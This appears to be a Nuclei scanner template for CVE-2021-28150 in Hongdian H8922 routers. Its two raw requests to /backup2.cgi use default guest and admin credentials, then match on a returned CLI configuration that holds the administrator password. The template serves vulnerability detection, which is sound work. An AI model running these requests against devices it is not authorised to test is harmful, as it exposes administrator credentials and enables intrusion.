55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2021-28150
|
|
|
|
info:
|
|
name: Hongdian Sensitive Information
|
|
author: gy741
|
|
severity: medium
|
|
description: |
|
|
Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
|
|
reference:
|
|
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
|
|
tags: cve,cve2021,hongdian,exposure
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /backup2.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cache-Control: max-age=0
|
|
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Connection: close
|
|
|
|
- |
|
|
GET /backup2.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cache-Control: max-age=0
|
|
Authorization: Basic YWRtaW46YWRtaW4=
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
|
Connection: close
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "application/octet-stream"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- "CLI configuration saved from vty"
|
|
- "service webadmin"
|
|
part: body |